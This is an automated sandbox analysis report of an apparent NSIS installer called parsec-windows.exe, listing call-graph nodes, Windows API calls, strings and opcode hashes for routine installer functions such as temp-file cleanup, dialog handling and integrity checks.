MessageBoxIndirectW 3587->3588 3589 403a76 ExitProcess 3587->3589 3588->3589 3591 406069 GetTickCount GetTempFileNameW 3590->3591 3592 40352b 3591->3592 3593 40609f 3591->3593 3592->3419 3593->3591 3593->3592 3594->3499 3595->3501 3596->3505 3598 403022 3597->3598 3599 40303a 3597->3599 3600 403032 3598->3600 3601 40302b DestroyWindow 3598->3601 3602 403042 3599->3602 3603 40304a GetTickCount 3599->3603 3600->3508 3601->3600 3604 406946 2 API calls 3602->3604 3605 403058 CreateDialogParamW ShowWindow 3603->3605 3606 40307b 3603->3606 3607 403048 3604->3607 3605->3606 3606->3508 3607->3508 3608->3516 3609->3515 3611 403ed6 3610->3611 3627 406484 wsprintfW 3611->3627 3613 403f47 3628 403f7b 3613->3628 3615 403c77 3615->3538 3616 403f4c 3616->3615 3617 40657a 17 API calls 3616->3617 3617->3616 3631 4044e5 3618->3631 3620 405695 3623 401389 2 API calls 3620->3623 3624 4056bc 3620->3624 3621 4044e5 SendMessageW 3622 4056ce CoUninitialize 3621->3622 3622->3570 3623->3620 3624->3621 3625->3535 3626->3540 3627->3613 3629 40657a 17 API calls 3628->3629 3630 403f89 SetWindowTextW 3629->3630 3630->3616 3632 4044fd 3631->3632 3633 4044ee SendMessageW 3631->3633 3632->3620 3633->3632 4390 401a30 4391 402da6 17 API calls 4390->4391 4392 401a39 ExpandEnvironmentStringsW 4391->4392 4393 401a4d 4392->4393 4395 401a60 4392->4395 4394 401a52 lstrcmpW 4393->4394 4393->4395 4394->4395 4401 4023b2 4402 4023ba 4401->4402 4404 4023c0 4401->4404 4403 402da6 17 API calls 4402->4403 4403->4404 4405 402da6 17 API calls 4404->4405 4406 4023ce 4404->4406 4405->4406 4407 4023dc 4406->4407 4408 402da6 17 API calls 4406->4408 4409 402da6 17 API calls 4407->4409 4408->4407 4410 4023e5 WritePrivateProfileStringW 4409->4410 3739 402434 3740 402467 3739->3740 3741 40243c 3739->3741 3742 402da6 17 API calls 3740->3742 3743 402de6 17 API calls 3741->3743 3744 40246e 3742->3744 3745 402443 3743->3745 3750 402e64 3744->3750 3747 40247b 3745->3747 3748 402da6 17 API calls 3745->3748 3749 402454 RegDeleteValueW RegCloseKey 3748->3749 3749->3747 3751 402e71 3750->3751 3752 402e78 3750->3752 3751->3747 3752->3751 3754 402ea9 3752->3754 3755 4063aa RegOpenKeyExW 3754->3755 3756 402ed7 3755->3756 3757 402ee1 3756->3757 3758 402f8c 3756->3758 3759 402ee7 RegEnumValueW 3757->3759 3766 402f0a 3757->3766 3758->3751 3761 402f71 RegCloseKey 3759->3761 3759->3766 3760 402f46 RegEnumKeyW 3762 402f4f RegCloseKey 3760->3762 3760->3766 3761->3758 3763 40690a 5 API calls 3762->3763 3765 402f5f 3763->3765 3764 402ea9 6 API calls 3764->3766 3767 402f81 3765->3767 3768 402f63 RegDeleteKeyW 3765->3768 3766->3760 3766->3761 3766->3762 3766->3764 3767->3758 3768->3758 4411 401735 4412 402da6 17 API calls 4411->4412 4413 40173c SearchPathW 4412->4413 4414 401757 4413->4414 4415 401d38 4416 402d84 17 API calls 4415->4416 4417 401d3f 4416->4417 4418 402d84 17 API calls 4417->4418 4419 401d4b GetDlgItem 4418->4419 4420 402638 4419->4420 4421 4014b8 4422 4014be 4421->4422 4423 401389 2 API calls 4422->4423 4424 4014c6 4423->4424 4425 40263e 4426 402652 4425->4426 4427 40266d 4425->4427 4428 402d84 17 API calls 4426->4428 4429 402672 4427->4429 4430 40269d 4427->4430 4437 402659 4428->4437 4431 402da6 17 API calls 4429->4431 4432 402da6 17 API calls 4430->4432 4434 402679 4431->4434 4433 4026a4 lstrlenW 4432->4433 4433->4437 4442 40655f WideCharToMultiByte 4434->4442 4436 40268d lstrlenA 4436->4437 4438 4026d1 4437->4438 4439 4026e7 4437->4439 4441 40610e 5 API calls 4437->4441 4438->4439 4440 4060df WriteFile 4438->4440 4440->4439 4441->4438 4442->4436

                                Executed Functions

                                Function 00405C49 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 148filestringCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 621 405c49-405c6f call 405f14 624 405c71-405c83 DeleteFileW 621->624 625 405c88-405c8f 621->625 626 405e05-405e09 624->626 627 405c91-405c93 625->627 628 405ca2-405cb2 call 40653d 625->628 629 405db3-405db8 627->629 630 405c99-405c9c 627->630 636 405cc1-405cc2 call 405e58 628->636 637 405cb4-405cbf lstrcatW 628->637 629->626 632 405dba-405dbd 629->632 630->628 630->629 634 405dc7-405dcf call 406873 632->634 635 405dbf-405dc5 632->635 634->626 645 405dd1-405de5 call 405e0c call 405c01 634->645 635->626 639 405cc7-405ccb 636->639 637->639 641 405cd7-405cdd lstrcatW 639->641 642 405ccd-405cd5 639->642 644 405ce2-405cfe lstrlenW FindFirstFileW 641->644 642->641 642->644 646 405d04-405d0c 644->646 647 405da8-405dac 644->647 661 405de7-405dea 645->661 662 405dfd-405e00 call 40559f 645->662 649 405d2c-405d40 call 40653d 646->649 650 405d0e-405d16 646->650 647->629 652 405dae 647->652 663 405d42-405d4a 649->663 664 405d57-405d62 call 405c01 649->664 653 405d18-405d20 650->653 654 405d8b-405d9b FindNextFileW 650->654 652->629 653->649 657 405d22-405d2a 653->657 654->646 660 405da1-405da2 FindClose 654->660 657->649 657->654 660->647 661->635 667 405dec-405dfb call 40559f call 4062fd 661->667 662->626 663->654 668 405d4c-405d55 call 405c49 663->668 672 405d83-405d86 call 40559f 664->672 673 405d64-405d67 664->673 667->626 668->654 672->654 676 405d69-405d79 call 40559f call 4062fd 673->676 677 405d7b-405d81 673->677 676->654 677->654
                                APIs
                                • DeleteFileW.KERNELBASE(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405C72
                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsvA814.tmp\*.*,\*.*,C:\Users\user\AppData\Local\Temp\nsvA814.tmp\*.*,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CBA
                                • lstrcatW.KERNEL32(?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsvA814.tmp\*.*,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CDD
                                • lstrlenW.KERNEL32(?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsvA814.tmp\*.*,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CE3
                                • FindFirstFileW.KERNELBASE(C:\Users\user\AppData\Local\Temp\nsvA814.tmp\*.*,?,?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsvA814.tmp\*.*,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CF3
                                • FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D93
                                • FindClose.KERNEL32(00000000), ref: 00405DA2
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2126016366.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000C.00000002.2125991256.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126040311.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.0000000000436000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126234554.0000000000465000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_400000_parsec-windows.jbxd
                                Similarity
                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                • String ID: .$.$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsvA814.tmp\*.*$\*.*
                                • API String ID: 2035342205-184083500
                                • Opcode ID: 91e5555b9508150fcf6e55f7c9d4dc2ae8152fc7335161658e002f7252bbf59f
                                • Instruction ID: 8b2ee76931e9ba666d6dc67a471f1b560bbb00ea1adf29c264b32972d7114dcf
                                • Opcode Fuzzy Hash: 91e5555b9508150fcf6e55f7c9d4dc2ae8152fc7335161658e002f7252bbf59f
                                • Instruction Fuzzy Hash: 3D41A130900A14BADB216B65CC8DABF7678DF81714F14817FF841B21D1D77C4A819EAE
                                Function 00406873 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                Download Yara Rule
                                APIs
                                • FindFirstFileW.KERNELBASE(74DF3420,004302B8,C:\,00405F5D,C:\,C:\,00000000,C:\,C:\,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 0040687E
                                • FindClose.KERNELBASE(00000000), ref: 0040688A
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2126016366.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000C.00000002.2125991256.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126040311.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.0000000000436000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126234554.0000000000465000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_400000_parsec-windows.jbxd
                                Similarity
                                • API ID: Find$CloseFileFirst
                                • String ID: C:\
                                • API String ID: 2295610775-3404278061
                                • Opcode ID: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
                                • Instruction ID: 67599a3b69382adcf67454a25bfea179debcebd0a6e2e92eb77ede12202c023a
                                • Opcode Fuzzy Hash: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
                                • Instruction Fuzzy Hash: C3D012325192205FC3402B386E0C84B7A989F16331726CB76B4AAF51E0D7388C7387BD
                                Function 00404F06 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 192 404f06-404f52 GetDlgItem * 2 193 404f58-404ff0 GlobalAlloc LoadImageW SetWindowLongW ImageList_Create ImageList_AddMasked SendMessageW * 2 192->193 194 40517d-405184 192->194 197 404ff2-404ffd SendMessageW 193->197 198 404fff-405006 DeleteObject 193->198 195 405186-405196 194->195 196 405198 194->196 199 40519b-4051a4 195->199 196->199 197->198 200 405008-405010 198->200 201 4051a6-4051a9 199->201 202 4051af-4051b5 199->202 203 405012-405015 200->203 204 405039-40503d 200->204 201->202 206 405293-40529a 201->206 207 4051c4-4051cb 202->207 208 4051b7-4051be 202->208 209 405017 203->209 210 40501a-405037 call 40657a SendMessageW * 2 203->210 204->200 205 40503f-40506f call 404499 * 2 204->205 248 405075-40507b 205->248 249 40513f-405152 GetWindowLongW SetWindowLongW 205->249 215 40530b-405313 206->215 216 40529c-4052a2 206->216 211 405240-405243 207->211 212 4051cd-4051d0 207->212 208->206 208->207 209->210 210->204 211->206 217 405245-40524f 211->217 220 4051d2-4051d9 212->220 221 4051db-4051f0 call 404e54 212->221 218 405315-40531b SendMessageW 215->218 219 40531d-405324 215->219 224 4052a8-4052b2 216->224 225 4054fe-405510 call 404500 216->225 226 405251-40525d SendMessageW 217->226 227 40525f-405269 217->227 218->219 229 405326-40532d 219->229 230 405358-40535f 219->230 220->211 220->221 221->211 247 4051f2-405203 221->247 224->225 233 4052b8-4052c7 SendMessageW 224->233 226->227 227->206 234 40526b-405275 227->234 236 405336-40533d 229->236 237 40532f-405330 ImageList_Destroy 229->237 240 4054c0-4054c7 230->240 241 405365-405371 call 4011ef 230->241 233->225 242 4052cd-4052de SendMessageW 233->242 243 405286-405290 234->243 244 405277-405284 234->244 245 405346-405352 236->245 246 40533f-405340 GlobalFree 236->246 237->236 240->225 253 4054c9-4054d0 240->253 266 405381-405384 241->266 267 405373-405376 241->267 251 4052e0-4052e6 242->251 252 4052e8-4052ea 242->252 243->206 244->206 245->230 246->245 247->211 256 405205-405207 247->256 257 40507e-405084 248->257 255 405158-40515b 249->255 251->252 259 4052eb-405304 call 401299 SendMessageW 251->259 252->259 253->225 254 4054d2-4054fc ShowWindow GetDlgItem ShowWindow 253->254 254->225 260 405175-405178 call 4044ce 255->260 261 40515d-405170 ShowWindow call 4044ce 255->261 262 405209-405210 256->262 263 40521a 256->263 264 405121-405134 257->264 265 40508a-4050b5 257->265 259->215 260->194 261->225 274 405212-405214 262->274 275 405216-405218 262->275 276 40521d-405239 call 40117d 263->276 264->257 269 40513a-40513d 264->269 277 4050f1-4050f3 265->277 278 4050b7-4050ef SendMessageW 265->278 270 4053c5-4053e9 call 4011ef 266->270 271 405386-40539f call 4012e2 call 401299 266->271 279 405378 267->279 280 405379-40537c call 404ed4 267->280 269->249 269->255 293 40548b-405494 270->293 294 4053ef 270->294 299 4053a1-4053a7 271->299 300 4053af-4053be SendMessageW 271->300 274->276 275->276 276->211 286 4050f5-405107 SendMessageW 277->286 287 405109-40511e SendMessageW 277->287 278->264 279->280 280->266 286->264 287->264 296 4054a2-4054aa 293->296 297 405496-40549c InvalidateRect 293->297 298 4053f2-4053fd 294->298 296->240 303 4054ac-4054bb call 404e27 call 404e0f 296->303 297->296 301 405473-405485 298->301 302 4053ff-40540e 298->302 306 4053a9 299->306 307 4053aa-4053ad 299->307 300->270 301->293 301->298 304 405410-40541d 302->304 305 405421-405424 302->305 303->240 304->305 309 405426-405429 305->309 310 40542b-405434 305->310 306->307 307->299 307->300 312 405439-405471 SendMessageW * 2 309->312 310->312 313 405436 310->313 312->301 313->312
                                APIs
                                • GetDlgItem.USER32(?,000003F9), ref: 00404F1E
                                • GetDlgItem.USER32(?,00000408), ref: 00404F29
                                • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F73
                                • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404F8A
                                • SetWindowLongW.USER32(?,000000FC,00405513), ref: 00404FA3
                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FB7
                                • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FC9
                                • SendMessageW.USER32(?,00001109,00000002), ref: 00404FDF
                                • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FEB
                                • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404FFD
                                • DeleteObject.GDI32(00000000), ref: 00405000
                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0040502B
                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405037
                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050D2
                                • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405102
                                  • Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405116
                                • GetWindowLongW.USER32(?,000000F0), ref: 00405144
                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405152
                                • ShowWindow.USER32(?,00000005), ref: 00405162
                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 0040525D
                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052C2
                                • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052D7
                                • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004052FB
                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040531B
                                • ImageList_Destroy.COMCTL32(?), ref: 00405330
                                • GlobalFree.KERNEL32(?), ref: 00405340
                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053B9
                                • SendMessageW.USER32(?,00001102,?,?), ref: 00405462
                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405471
                                • InvalidateRect.USER32(?,00000000,00000001), ref: 0040549C
                                • ShowWindow.USER32(?,00000000), ref: 004054EA
                                • GetDlgItem.USER32(?,000003FE), ref: 004054F5
                                • ShowWindow.USER32(00000000), ref: 004054FC
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2126016366.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000C.00000002.2125991256.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126040311.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.0000000000436000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126234554.0000000000465000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_400000_parsec-windows.jbxd
                                Similarity
                                • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                • String ID: $M$N
                                • API String ID: 2564846305-813528018
                                • Opcode ID: 8650db15f8eec7f2c7436ff7bc9e6097db9116c58dec0643669c66b6eab2f928
                                • Instruction ID: 669472b6e39b4296dbb294a81ed98d86f32f22d8abeb4cff7518c6a892085abf
                                • Opcode Fuzzy Hash: 8650db15f8eec7f2c7436ff7bc9e6097db9116c58dec0643669c66b6eab2f928
                                • Instruction Fuzzy Hash: EF028A70900608EFDB20DFA9DD45AAF7BB5FB84314F10817AE610BA2E0D7799942DF58
                                Function 0040307D Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 181memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 496 40307d-4030cb GetTickCount GetModuleFileNameW call 40602d 499 4030d7-403105 call 40653d call 405e58 call 40653d GetFileSize 496->499 500 4030cd-4030d2 496->500 508 4031f0-4031fe call 403019 499->508 509 40310b 499->509 501 4032ad-4032b1 500->501 515 403200-403203 508->515 516 403253-403258 508->516 511 403110-403127 509->511 513 403129 511->513 514 40312b-403134 call 4034cf 511->514 513->514 522 40325a-403262 call 403019 514->522 523 40313a-403141 514->523 518 403205-40321d call 4034e5 call 4034cf 515->518 519 403227-403251 GlobalAlloc call 4034e5 call 4032b4 515->519 516->501 518->516 542 40321f-403225 518->542 519->516 547 403264-403275 519->547 522->516 527 403143-403157 call 405fe8 523->527 528 4031bd-4031c1 523->528 533 4031cb-4031d1 527->533 545 403159-403160 527->545 532 4031c3-4031ca call 403019 528->532 528->533 532->533 538 4031e0-4031e8 533->538 539 4031d3-4031dd call 4069f7 533->539 538->511 546 4031ee 538->546 539->538 542->516 542->519 545->533 551 403162-403169 545->551 546->508 548 403277 547->548 549 40327d-403282 547->549 548->549 552 403283-403289 549->552 551->533 553 40316b-403172 551->553 552->552 554 40328b-4032a6 SetFilePointer call 405fe8 552->554 553->533 555 403174-40317b 553->555 559 4032ab 554->559 555->533 556 40317d-40319d 555->556 556->516 558 4031a3-4031a7 556->558 560 4031a9-4031ad 558->560 561 4031af-4031b7 558->561 559->501 560->546 560->561 561->533 562 4031b9-4031bb 561->562 562->533
                                APIs
                                • GetTickCount.KERNEL32 ref: 0040308E
                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe,00000400,?,?,?,?,?,0040387D,?), ref: 004030AA
                                  • Part of subcall function 0040602D: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                                  • Part of subcall function 0040602D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053
                                • GetFileSize.KERNEL32(00000000,00000000,00444000,00000000,C:\Users\user\AppData\Roaming\PSecWin,C:\Users\user\AppData\Roaming\PSecWin,C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe,C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe,80000000,00000003,?,?,?,?,?,0040387D), ref: 004030F6
                                • GlobalAlloc.KERNELBASE(00000040,}8@,?,?,?,?,?,0040387D,?), ref: 0040322C
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2126016366.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000C.00000002.2125991256.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126040311.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.0000000000436000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126234554.0000000000465000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_400000_parsec-windows.jbxd
                                Similarity
                                • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\PSecWin$C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$}8@
                                • API String ID: 2803837635-123549853
                                • Opcode ID: 9b3c223e6497c9ecab6ee529ea5d4dae661a82a949c3a0db8cd0915d622aa761
                                • Instruction ID: 750c061bb954c4555836cecba7cc54c639b148d890841a972b43b12454d44aa7
                                • Opcode Fuzzy Hash: 9b3c223e6497c9ecab6ee529ea5d4dae661a82a949c3a0db8cd0915d622aa761
                                • Instruction Fuzzy Hash: 7951B571904204AFDB10AF65ED42B9E7EACAB48756F14807BF904B62D1C77C9F408B9D
                                Function 0040657A Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 196stringCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 563 40657a-406585 564 406587-406596 563->564 565 406598-4065ae 563->565 564->565 566 4065b0-4065bd 565->566 567 4065c6-4065cf 565->567 566->567 568 4065bf-4065c2 566->568 569 4065d5 567->569 570 4067aa-4067b5 567->570 568->567 571 4065da-4065e7 569->571 572 4067c0-4067c1 570->572 573 4067b7-4067bb call 40653d 570->573 571->570 574 4065ed-4065f6 571->574 573->572 576 406788 574->576 577 4065fc-406639 574->577 580 406796-406799 576->580 581 40678a-406794 576->581 578 40672c-406731 577->578 579 40663f-406646 577->579 585 406733-406739 578->585 586 406764-406769 578->586 582 406648-40664a 579->582 583 40664b-40664d 579->583 584 40679b-4067a4 580->584 581->584 582->583 587 40668a-40668d 583->587 588 40664f-40666d call 40640b 583->588 584->570 591 4065d7 584->591 592 406749-406755 call 40653d 585->592 593 40673b-406747 call 406484 585->593 589 406778-406786 lstrlenW 586->589 590 40676b-406773 call 40657a 586->590 597 40669d-4066a0 587->597 598 40668f-40669b GetSystemDirectoryW 587->598 602 406672-406676 588->602 589->584 590->589 591->571 601 40675a-406760 592->601 593->601 604 4066a2-4066b0 GetWindowsDirectoryW 597->604 605 406709-40670b 597->605 603 40670d-406711 598->603 601->589 606 406762 601->606 608 406713-406717 602->608 609 40667c-406685 call 40657a 602->609 603->608 610 406724-40672a call 4067c4 603->610 604->605 605->603 607 4066b2-4066ba 605->607 606->610 614 4066d1-4066e7 SHGetSpecialFolderLocation 607->614 615 4066bc-4066c5 607->615 608->610 611 406719-40671f lstrcatW 608->611 609->603 610->589 611->610 616 406705 614->616 617 4066e9-406703 SHGetPathFromIDListW CoTaskMemFree 614->617 620 4066cd-4066cf 615->620 616->605 617->603 617->616 620->603 620->614
                                APIs
                                • GetSystemDirectoryW.KERNEL32(Remove folder: ,00000400), ref: 00406695
                                • GetWindowsDirectoryW.KERNEL32(Remove folder: ,00000400,00000000,Remove folder: C:\Users\user\AppData\Local\Temp\nsvA814.tmp\,?,004055D6,Remove folder: C:\Users\user\AppData\Local\Temp\nsvA814.tmp\,00000000,00000000,00424620,74DF23A0), ref: 004066A8
                                • lstrcatW.KERNEL32(Remove folder: ,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                                • lstrlenW.KERNEL32(Remove folder: ,00000000,Remove folder: C:\Users\user\AppData\Local\Temp\nsvA814.tmp\,?,004055D6,Remove folder: C:\Users\user\AppData\Local\Temp\nsvA814.tmp\,00000000), ref: 00406779
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2126016366.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000C.00000002.2125991256.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126040311.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.0000000000436000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126234554.0000000000465000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_400000_parsec-windows.jbxd
                                Similarity
                                • API ID: Directory$SystemWindowslstrcatlstrlen
                                • String ID: 0x000017F5$Remove folder: $Remove folder: C:\Users\user\AppData\Local\Temp\nsvA814.tmp\$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                • API String ID: 4260037668-716171807
                                • Opcode ID: c06be4e573324e40d3b735838f303e9f3324c9f348604da111048893f4ce4833
                                • Instruction ID: 685928b229c5d1fd60d609eb920d771e11fa4d776b5b66b0bad6c944a0f90ddf
                                • Opcode Fuzzy Hash: c06be4e573324e40d3b735838f303e9f3324c9f348604da111048893f4ce4833
                                • Instruction Fuzzy Hash: 1D61D131900205EADB209F64DD80BAE77A5EF54318F22813BE907B72D0D77D99A1CB5D
                                Function 0040176F Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145stringtimeCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
